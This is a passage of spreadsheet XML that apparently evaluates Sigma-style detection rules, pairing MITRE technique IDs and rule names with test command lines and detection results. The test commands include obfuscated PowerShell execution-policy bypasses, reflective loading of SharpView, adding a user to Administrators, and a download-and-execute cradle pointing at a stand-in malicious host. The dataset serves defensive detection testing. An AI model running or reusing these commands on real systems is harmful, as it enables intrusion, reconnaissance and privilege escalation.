        <v>1</v>
      </c>
      <c r="G1770" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1770" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1770" s="43" t="n"/>
      <c r="J1770" s="43" t="n"/>
      <c r="K1770" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1771" ht="15.75" customHeight="1" s="42">
      <c r="A1771" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1771" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1771" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1771" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1771" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F1771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1771" s="43" t="n"/>
      <c r="J1771" s="43" t="n"/>
      <c r="K1771" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1772" ht="15.75" customHeight="1" s="42">
      <c r="A1772" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1772" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1772" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1772" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1772" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"ExecutionPolicy" Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1772" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1772" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1772" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1772" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33)</t>
        </is>
      </c>
      <c r="J1772" s="43" t="n"/>
      <c r="K1772" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1773" ht="15.75" customHeight="1" s="42">
      <c r="A1773" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1773" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1773" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1773" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1773" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -ExeCUTIONPOLICY Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1773" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1773" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1773" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1773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773" s="43" t="n"/>
      <c r="K1773" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1774" ht="15.75" customHeight="1" s="42">
      <c r="A1774" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1774" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1774" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1774" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1774" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -EXeCutIONPOlIcY Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1774" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1774" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1774" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1774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774" s="43" t="n"/>
      <c r="K1774" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1775" ht="15.75" customHeight="1" s="42">
      <c r="A1775" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1775" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1775" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1775" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1775" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROfILe -ep Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1775" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1775" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1775" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1775" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); 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775" s="43" t="n"/>
      <c r="K1775" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1776" ht="15.75" customHeight="1" s="42">
      <c r="A1776" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1776" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1776" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1776" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1776" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"ExecutionPolicy" Bypass -COmMaNd "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1776" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1776" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1776" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1776" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33)</t>
        </is>
      </c>
      <c r="J1776" s="43" t="n"/>
      <c r="K1776" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1777" ht="15.75" customHeight="1" s="42">
      <c r="A1777" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1777" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1777" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1777" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1777" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -eXecUTIoNpolicY Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1777" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1777" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1777" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1777" s="43" t="n"/>
      <c r="K1777" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1778" ht="15.75" customHeight="1" s="42">
      <c r="A1778" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1778" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1778" s="43" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1778" s="43" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1778" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1778" s="43" t="n"/>
      <c r="J1778" s="43" t="n"/>
      <c r="K1778" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1779" ht="15.75" customHeight="1" s="42">
      <c r="A1779" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1779" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1779" s="43" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1779" s="43" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1779" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1779" s="43" t="n"/>
      <c r="J1779" s="43" t="n"/>
      <c r="K1779" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1780" ht="15.75" customHeight="1" s="42">
      <c r="A1780" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1780" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1780" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1780" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1780" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -"Command" "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F1780" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1780" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1780" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1780" s="43" t="n"/>
      <c r="J1780" s="43" t="n"/>
      <c r="K1780" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1781" ht="15.75" customHeight="1" s="42">
      <c r="A1781" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1781" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1781" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1781" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1781" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -coMmANd "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F1781" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1781" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1781" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1781" s="43" t="n"/>
      <c r="J1781" s="43" t="n"/>
      <c r="K1781" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1782" ht="15.75" customHeight="1" s="42">
      <c r="A1782" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1782" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1782" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1782" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1782" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -CommAnd "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F1782" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1782" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1782" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1782" s="43" t="n"/>
      <c r="J1782" s="43" t="n"/>
      <c r="K1782" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1783" ht="15.75" customHeight="1" s="42">
      <c r="A1783" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1783" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1783" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1783" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1783" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -cOmMand "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F1783" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1783" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1783" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1783" s="43" t="n"/>
      <c r="J1783" s="43" t="n"/>
      <c r="K1783" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1784" ht="15.75" customHeight="1" s="42">
      <c r="A1784" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1784" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1784" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1784" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1784" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -"Command" "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F1784" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1784" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1784" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1784" s="43" t="n"/>
      <c r="J1784" s="43" t="n"/>
      <c r="K1784" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1785" ht="15.75" customHeight="1" s="42">
      <c r="A1785" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1785" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1785" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1785" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1785" s="43" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SOFTWARE\Microsoft\Cryptography').GetValue('MachineGuid')"</t>
        </is>
      </c>
      <c r="F1785" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1785" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1785" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1785" s="43" t="n"/>
      <c r="J1785" s="43" t="n"/>
      <c r="K1785" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1786" ht="15.75" customHeight="1" s="42">
      <c r="A1786" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1786" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1786" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1786" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1786" s="43" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" -c "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F1786" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1786" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1786" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1786" s="43" t="n"/>
      <c r="J1786" s="43" t="n"/>
      <c r="K1786" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1787" ht="15.75" customHeight="1" s="42">
      <c r="A1787" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1787" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1787" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1787" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1787" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -c "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F1787" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1787" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1787" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1787" s="43" t="n"/>
      <c r="J1787" s="43" t="n"/>
      <c r="K1787" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1788" ht="15.75" customHeight="1" s="42">
      <c r="A1788" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1788" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1788" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1788" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1788" s="43" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" -COmmanD "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F1788" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1788" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1788" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1788" s="43" t="n"/>
      <c r="J1788" s="43" t="n"/>
      <c r="K1788" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1789" ht="15.75" customHeight="1" s="42">
      <c r="A1789" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1789" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1789" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1789" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1789" s="43" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" -coMMAND "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F1789" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1789" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1789" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1789" s="43" t="n"/>
      <c r="J1789" s="43" t="n"/>
      <c r="K1789" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1790" ht="15.75" customHeight="1" s="42">
      <c r="A1790" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1790" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1790" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1790" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1790" s="43" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" -cOmmAnD "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Cryptography' | Select-Object -ExpandProperty MachineGuid"</t>
        </is>
      </c>
      <c r="F1790" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1790" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1790" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1790" s="43" t="n"/>
      <c r="J1790" s="43" t="n"/>
      <c r="K1790" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1791" ht="15.75" customHeight="1" s="42">
      <c r="A1791" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1791" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_system_info_uncommon</t>
        </is>
      </c>
      <c r="C1791" s="43" t="inlineStr">
        <is>
          <t>Uncommon System Information Discovery Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1791" s="43" t="inlineStr">
        <is>
          <t>9d5a1274-922a-49d0-87f3-8c653483b909</t>
        </is>
      </c>
      <c r="E1791" s="43" t="inlineStr">
        <is>
          <t>wmic LOGICALDISK where "Name='C:'" get Name,Size,FreeSpace /format:csv</t>
        </is>
      </c>
      <c r="F1791" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1791" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1791" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1791" s="43" t="n"/>
      <c r="J1791" s="43" t="n"/>
      <c r="K1791" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1792" ht="15.75" customHeight="1" s="42">
      <c r="A1792" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1792" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_system_info_uncommon</t>
        </is>
      </c>
      <c r="C1792" s="43" t="inlineStr">
        <is>
          <t>Uncommon System Information Discovery Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1792" s="43" t="inlineStr">
        <is>
          <t>9d5a1274-922a-49d0-87f3-8c653483b909</t>
        </is>
      </c>
      <c r="E1792" s="43" t="inlineStr">
        <is>
          <t>wmic os get Caption /value &amp;&amp; wmic os get OSArchitecture /value &amp;&amp; wmic os get Version /value</t>
        </is>
      </c>
      <c r="F1792" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1792" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1792" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1792" s="43" t="n"/>
      <c r="J1792" s="43" t="n"/>
      <c r="K1792" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1793" ht="15.75" customHeight="1" s="42">
      <c r="A1793" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1793" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1793" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1793" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1793" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F1793" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1793" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1793" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1793" s="43" t="n"/>
      <c r="J1793" s="43" t="n"/>
      <c r="K1793" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1794" ht="15.75" customHeight="1" s="42">
      <c r="A1794" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1794" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1794" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1794" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1794" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F1794" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1794" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1794" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1794" s="43" t="n"/>
      <c r="J1794" s="43" t="n"/>
      <c r="K1794" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1795" ht="15.75" customHeight="1" s="42">
      <c r="A1795" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1795" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1795" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1795" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1795" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -COMmAND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1795" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1795" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1795" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1795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795" s="43" t="n"/>
      <c r="K1795" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1796" ht="15.75" customHeight="1" s="42">
      <c r="A1796" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1796" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1796" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1796" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1796" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -cOMmAnd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1796" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1796" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1796" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1796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796" s="43" t="n"/>
      <c r="K1796" s="43" t="b">
        <v>0</v>
      </c>
    </row>
